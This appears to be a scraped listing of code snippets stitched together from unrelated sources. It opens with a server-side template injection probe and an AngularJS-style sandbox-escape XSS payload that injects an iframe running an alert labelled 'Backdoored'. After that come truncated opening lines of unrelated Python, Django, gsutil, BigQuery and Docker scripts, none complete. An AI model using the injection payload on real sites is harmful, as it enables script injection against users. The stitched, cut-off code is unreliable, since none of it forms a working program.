{{7*7}}
'a'.constructor.fromCharCode=[].join;
'a'.constructor[0]='\u003ciframe onload=alert(/Backdoored/)\u003e';
| import socket | |
| from flask import Flask, request | |
| import sys | |
| from threading import Thread | |
| from time import sleep | |
| app = Flask(__name__) | |
| HTTP_METHODS = ['GET', 'HEAD', 'POST', 'PUT', 'DELETE', 'CONNECT', 'OPTIONS', 'TRACE', 'PATCH'] |
| import datetime | |
| from time import sleep, time | |
| from dateutil.relativedelta import relativedelta | |
| from collections import OrderedDict | |
| def calculate_diff(dt2, dt1): | |
| dt1 = datetime.datetime.fromtimestamp(dt1) |
| import os | |
| from random import choice | |
| import argparse | |
| from tqdm import tqdm | |
| import base64 | |
| import re | |
| import requests | |
| FILE_NAME = 'proxies_downloaded.txt' |
| import os | |
| os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'minimaldjango.settings') | |
| from django.forms import DateField | |
| from rest_framework import routers | |
| from rest_framework.serializers import ModelSerializer | |
| from rest_framework.viewsets import ModelViewSet | |
| from django.db.models import ( |
The given command is a single-line command using gsutil, the command-line tool for interacting with Google Cloud Storage. It performs a high-performance data transfer (copy) operation (cp) from one location in Google Cloud Storage (gs://source) to another location (gs://destination).
gsutil -o "GSUtil:parallel_composite_upload_threshold=150M" \
-o "GSUtil:parallel_thread_count=10" \
-o "GSUtil:check_hashes=if_fast_else_skip" \
-h "Content-Encoding:gzip" \
-o "GSUtil:sliced_object_download=true" \
| #!/bin/bash | |
| if [[ "$*" == *-v* ]]; then | |
| set -x | |
| fi | |
| source_project_id="${SOURCE_PROJECT_ID}" | |
| destination_project_id="${DESTINATION_PROJECT_ID}" | |
| dataset_name="${DATASET_NAME}" |
| #!/bin/bash | |
| # Purpose: This Bash script automates data migration between BigQuery and Google Cloud's storage. | |
| # It streamlines the process by using Google Cloud Storage as temporary storage. It's designed to export table | |
| # schemas to JSON, load data from CSV files into BigQuery for analysis, and securely move data between different | |
| # storage buckets. Additionally, it simplifies bucket management for organized data and enhanced redundancy. | |
| # Value: For GCP users, this script is invaluable for simplifying and expediting data migration tasks between | |
| # BigQuery, making it a crucial resource for data management. | |
| # How to Run: Before executing, set key variables like `SOURCE_PROJECT_ID`, `DESTINATION_PROJECT_ID`, | |
| # and `DATASET_NAME`. Then, prepare an input file listing the table names you want to process. Run the script in |
| from datetime import datetime | |
| import pandas as pd | |
| import requests | |
| pd.set_option('display.max_columns', 8) | |
| pd.set_option('max_seq_item', None) | |
| pd.set_option('display.width', 200) | |
| zones = [ | |
| 'US East (N. Virginia)', |
| ############################################################################## | |
| # Docker Installation Script for Ubuntu # | |
| # # | |
| # Automates the installation of Docker on Ubuntu systems. Checks if Docker # | |
| # is already installed; if not, it proceeds with the installation steps. # | |
| # # | |
| # This script simplifies Docker installation on Ubuntu by updating package # | |
| # lists, installing necessary dependencies like ca-certificates, curl, and # | |
| # gnupg, setting up the Docker repository, and installing Docker CE, # | |
| # Docker CLI, containerd.io, docker-buildx-plugin, and docker-compose-plugin # |